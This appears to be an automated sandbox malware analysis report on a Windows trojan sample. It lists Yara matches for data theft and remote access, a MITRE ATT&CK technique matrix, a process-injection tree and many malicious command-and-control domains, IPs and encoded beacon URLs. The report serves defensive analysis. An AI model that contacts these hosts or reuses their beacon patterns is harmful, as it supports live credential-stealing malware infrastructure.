                Source: explorer.exe, 00000003.00000000.1372975908.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3825318823.0000000001090000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
                Source: explorer.exe, 00000003.00000000.1372975908.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3825318823.0000000001090000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: explorer.exe, 00000003.00000000.1380877734.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2738994986.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.000000000936E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd]1Q
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Queries volume information: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe VolumeInformation
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0.2.duGqHKp0OUXaX1D.exe.4f50000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.duGqHKp0OUXaX1D.exe.4f50000.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1370280563.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1372677605.0000000004F50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                Source: Yara match | File source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0.2.duGqHKp0OUXaX1D.exe.4f50000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.duGqHKp0OUXaX1D.exe.4f50000.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1370280563.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1372677605.0000000004F50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix (a leading number is the count of signatures matched for that technique; techniques without a number were not observed)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                Execution: 1 Shared Modules; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Privilege Escalation: 412 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Defense Evasion: 1 Rootkit; 1 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 412 Process Injection; 11 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 22 Software Packing; 1 Timestomp; 1 DLL Side-Loading
                Credential Access: 1 Credential API Hooking; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                Discovery: 121 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 112 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                Collection: 1 Credential API Hooking; 11 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                Command and Control: 1 Encrypted Channel; 4 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 1410995 | Sample: duGqHKp0OUXaX1D.exe | Start date: 18/03/2024 | Architecture: WINDOWS | Score: 100
                Start
                  DNS/IP: www.beatricesswarthout.xyz; www.velvetgloveseasonings.store; 11 other IPs or domains
                  Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
                  www.beatricesswarthout.xyz: Performs DNS queries to domains with low reputation
                  -> duGqHKp0OUXaX1D.exe 3 (started)
                       Signatures: Tries to detect virtualization through RDTSC time measurements
                       -> duGqHKp0OUXaX1D.exe (started)
                            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                            -> explorer.exe 64 1 (injected)
                                 DNS/IP: www.velvetgloveseasonings.store 216.40.34.41, 49716, 80, TUCOWSCA Canada; maxhealthunity.com 15.197.142.173, 49718, 80, TANDEMUS United States; 6 other IPs or domains
                                 -> help.exe (started)
                                      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                                      -> cmd.exe 1 (started)
                                           -> conhost.exe (started)

                Source | Detection | Scanner | Label | Link
                duGqHKp0OUXaX1D.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.SpyNoon
                duGqHKp0OUXaX1D.exe | 100% | Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://powerpoint.office.comer | 0% | URL Reputation | safe
                http://www.microsoft.c | 0% | URL Reputation | safe
                http://www.agathis.funReferer: | 0% | Avira URL Cloud | safe
                http://www.maxhealthunity.com/ns03/ | 0% | Avira URL Cloud | safe
                http://www.velvetgloveseasonings.store/ns03/?9rQhA=J48H&Mli=vEpXOfxtbjALuLNDB5L7Pe2+oD++ppewNBRQcYUm39B9ZRdA7FQASoNacaXdwTFFIZyq | 0% | Avira URL Cloud | safe
                http://www.velvetgloveseasonings.store/ns03/ | 0% | Avira URL Cloud | safe
                http://www.yedxec.xyz | 0% | Avira URL Cloud | safe
                http://www.engagenotrage.com | 0% | Avira URL Cloud | safe
                http://www.velvetgloveseasonings.storeReferer: | 0% | Avira URL Cloud | safe
                http://www.beatricesswarthout.xyz | 0% | Avira URL Cloud | safe
                http://www.grupooceanique.com | 0% | Avira URL Cloud | safe
                http://www.yedxec.xyz/ns03/ | 0% | Avira URL Cloud | safe
                http://schemas.micro | 0% | URL Reputation | safe
                http://www.grupooceanique.com/ns03/ | 0% | Avira URL Cloud | safe
                http://www.gildedbeautyaesthitics.com/ns03/www.maxhealthunity.com | 0% | Avira URL Cloud | safe
                http://www.gildedbeautyaesthitics.comReferer: | 0% | Avira URL Cloud | safe
                http://www.scheuermannworks.com | 0% | Avira URL Cloud | safe
                http://www.leclandesparents.com | 0% | Avira URL Cloud | safe
                http://www.gildedbeautyaesthitics.com | 0% | Avira URL Cloud | safe
                http://www.gildedbeautyaesthitics.com/ns03/ | 0% | Avira URL Cloud | safe
                http://www.leclandesparents.com/ns03/www.yedxec.xyz | 0% | Avira URL Cloud | safe
                http://www.maxhealthunity.com | 0% | Avira URL Cloud | safe
                http://www.taiyuanbaoyang.com/ns03/www.beatricesswarthout.xyz | 0% | Avira URL Cloud | safe
                http://www.velvetgloveseasonings.store/ns03/www.gildedbeautyaesthitics.com | 0% | Avira URL Cloud | safe
                http://www.beatricesswarthout.xyzReferer: | 0% | Avira URL Cloud | safe
                http://www.beatricesswarthout.xyz/ns03/www.engagenotrage.com | 0% | Avira URL Cloud | safe
                http://www.elizabethsbookshelf.com | 0% | Avira URL Cloud | safe
                http://www.maxhealthunity.comReferer: | 0% | Avira URL Cloud | safe
                http://www.agathis.fun/ns03/ | 0% | Avira URL Cloud | safe
                http://www.maxhealthunity.com/ns03/www.fonbnk.pro | 0% | Avira URL Cloud | safe
                http://www.elizabethsbookshelf.com/ns03/ | 0% | Avira URL Cloud | safe
                http://www.leclandesparents.comReferer: | 0% | Avira URL Cloud | safe
                http://www.beatricesswarthout.xyz/ns03/?9rQhA=J48H&Mli=VQsc4N5v0Qb/taRRMjFMH1qaQdoag+l2H1v4gotC687CaJU5axHSv4xTKAqiMqdiZl4n | 0% | Avira URL Cloud | safe
                http://www.scheuermannworks.com/ns03/ | 0% | Avira URL Cloud | safe
                http://www.scheuermannworks.com/ns03/www.fichaphuman.net | 0% | Avira URL Cloud | safe
                http://www.yedxec.xyz/ns03/www.chuanruhaomen.com | 0% | Avira URL Cloud | safe
                http://www.yedxec.xyzReferer: | 0% | Avira URL Cloud | safe
                http://www.engagenotrage.com/ns03/ | 0% | Avira URL Cloud | safe
                http://www.repair-services.todayReferer: | 0% | Avira URL Cloud | safe
                http://www.gildedbeautyaesthitics.com/ns03/?Mli=Ejx28V0Mi/PKMFo4nxco0l6yr5i8wbzIhiv3vkPYYPmQLPpGZe2iDqne8+4JWli/3WeD&9rQhA=J48H | 0% | Avira URL Cloud | safe
                http://www.repair-services.today | 0% | Avira URL Cloud | safe
                http://www.leclandesparents.com/ns03/ | 0% | Avira URL Cloud | safe
                http://www.scheuermannworks.comReferer: | 0% | Avira URL Cloud | safe
                http://www.fonbnk.pro/ns03/www.scheuermannworks.com | 0% | Avira URL Cloud | safe
                http://www.scheuermannworks.com/ns03/?9rQhA=J48H&Mli=pFpcKhsoBDMiQsDxn6RNHE8RotFPog89cmb4qNEXsJuyXSeWzOEqXN59npsx+F1JRdEB | 0% | Avira URL Cloud | safe
                http://www.fichaphuman.netReferer: | 0% | Avira URL Cloud | safe
                http://www.fichaphuman.net/ns03/www.elizabethsbookshelf.com | 0% | Avira URL Cloud | safe
                http://www.elizabethsbookshelf.comReferer: | 0% | Avira URL Cloud | safe
                http://www.engagenotrage.com/ns03/www.velvetgloveseasonings.store | 0% | Avira URL Cloud | safe
                http://www.taiyuanbaoyang.comReferer: | 0% | Avira URL Cloud | safe
                http://www.maxhealthunity.com/ns03/?9rQhA=J48H&Mli=6xy0BlydHITJ62csFR1w9NwziEOpwYF/YRUtVwNXcka1y+WP4+BwE4Gzjf3LSGjZNmwj | 0% | Avira URL Cloud | safe
                www.grupooceanique.com/ns03/ | 0% | Avira URL Cloud | safe
                http://www.chuanruhaomen.com | 0% | Avira URL Cloud | safe
                http://www.fonbnk.proReferer: | 0% | Avira URL Cloud | safe
                http://www.grupooceanique.comReferer: | 0% | Avira URL Cloud | safe
                http://www.grupooceanique.com/ns03/www.repair-services.today | 0% | Avira URL Cloud | safe
                http://www.fichaphuman.net | 0% | Avira URL Cloud | safe
                http://www.beatricesswarthout.xyz/ns03/ | 0% | Avira URL Cloud | safe
                http://www.agathis.fun/ns03/www.grupooceanique.com | 0% | Avira URL Cloud | safe
                http://www.agathis.fun | 0% | Avira URL Cloud | safe
                http://www.fichaphuman.net/ns03/ | 0% | Avira URL Cloud | safe
                http://www.chuanruhaomen.comReferer: | 0% | Avira URL Cloud | safe
                http://www.agathis.fun/ns03/?9rQhA=J48H&Mli=KqqGrli78UDkBV4XlBvGehqbnDNs0x6MIHFba6A/A1mNeTCnsV+vzi3OAKYlREQ8vsy3 | 0% | Avira URL Cloud | safe
                http://www.elizabethsbookshelf.com/ns03/www.leclandesparents.com | 0% | Avira URL Cloud | safe
                http://www.repair-services.today/ns03/www.taiyuanbaoyang.com | 0% | Avira URL Cloud | safe
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                www.scheuermannworks.com | 208.91.197.27 | true | true | - | unknown
                gildedbeautyaesthitics.com | 192.0.78.25 | true | true | - | unknown
                www.taiyuanbaoyang.com | 172.67.160.57 | true | true | - | unknown
                www.beatricesswarthout.xyz | 172.67.171.253 | true | true | - | unknown
                www.agathis.fun | 104.21.23.10 | true | true | - | unknown
                www.repair-services.today | 172.67.146.200 | true | true | - | unknown
                maxhealthunity.com | 15.197.142.173 | true | true | - | unknown
                www.velvetgloveseasonings.store | 216.40.34.41 | true | true | - | unknown
                www.grupooceanique.com | unknown | unknown | true | - | unknown
                www.engagenotrage.com | unknown | unknown | true | - | unknown
                www.gildedbeautyaesthitics.com | unknown | unknown | true | - | unknown
                www.maxhealthunity.com | unknown | unknown | true | - | unknown
                www.fonbnk.pro | unknown | unknown | true | - | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://www.velvetgloveseasonings.store/ns03/?9rQhA=J48H&Mli=vEpXOfxtbjALuLNDB5L7Pe2+oD++ppewNBRQcYUm39B9ZRdA7FQASoNacaXdwTFFIZyq | true | Avira URL Cloud: safe | unknown
                http://www.beatricesswarthout.xyz/ns03/?9rQhA=J48H&Mli=VQsc4N5v0Qb/taRRMjFMH1qaQdoag+l2H1v4gotC687CaJU5axHSv4xTKAqiMqdiZl4n | true | Avira URL Cloud: safe | unknown
                http://www.gildedbeautyaesthitics.com/ns03/?Mli=Ejx28V0Mi/PKMFo4nxco0l6yr5i8wbzIhiv3vkPYYPmQLPpGZe2iDqne8+4JWli/3WeD&9rQhA=J48H | true | Avira URL Cloud: safe | unknown
                http://www.scheuermannworks.com/ns03/?9rQhA=J48H&Mli=pFpcKhsoBDMiQsDxn6RNHE8RotFPog89cmb4qNEXsJuyXSeWzOEqXN59npsx+F1JRdEB | true | Avira URL Cloud: safe | unknown
                http://www.maxhealthunity.com/ns03/?9rQhA=J48H&Mli=6xy0BlydHITJ62csFR1w9NwziEOpwYF/YRUtVwNXcka1y+WP4+BwE4Gzjf3LSGjZNmwj | true | Avira URL Cloud: safe | unknown
                www.grupooceanique.com/ns03/ | true | Avira URL Cloud: safe | low
                http://www.agathis.fun/ns03/?9rQhA=J48H&Mli=KqqGrli78UDkBV4XlBvGehqbnDNs0x6MIHFba6A/A1mNeTCnsV+vzi3OAKYlREQ8vsy3 | true | Avira URL Cloud: safe | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://powerpoint.office.comer | explorer.exe, 00000003.00000000.1390264939.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://www.agathis.funReferer: | explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://android.notify.windows.com/iOSA4 | explorer.exe, 00000003.00000002.3836964822.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076012374.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp | false | - | high
                http://www.yedxec.xyz | explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | - | high
                http://www.velvetgloveseasonings.store/ns03/ | explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.maxhealthunity.com/ns03/ | explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world | explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | - | high
                https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000003.00000000.1380877734.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3833748992.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | - | high
                http://www.grupooceanique.com | explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.yedxec.xyz/ns03/ | explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://excel.office.com | explorer.exe, 00000003.00000000.1390264939.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | - | high
                https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1 | explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | - | high
                http://www.engagenotrage.com | explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.velvetgloveseasonings.storeReferer: | explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.beatricesswarthout.xyz | explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.gildedbeautyaesthitics.com | explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmp | false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.leclandesparents.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.grupooceanique.com/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.taiyuanbaoyang.com/ns03/www.beatricesswarthout.xyzexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.gildedbeautyaesthitics.com/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.gildedbeautyaesthitics.com/ns03/www.maxhealthunity.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.gildedbeautyaesthitics.comReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.leclandesparents.com/ns03/www.yedxec.xyzexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.maxhealthunity.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
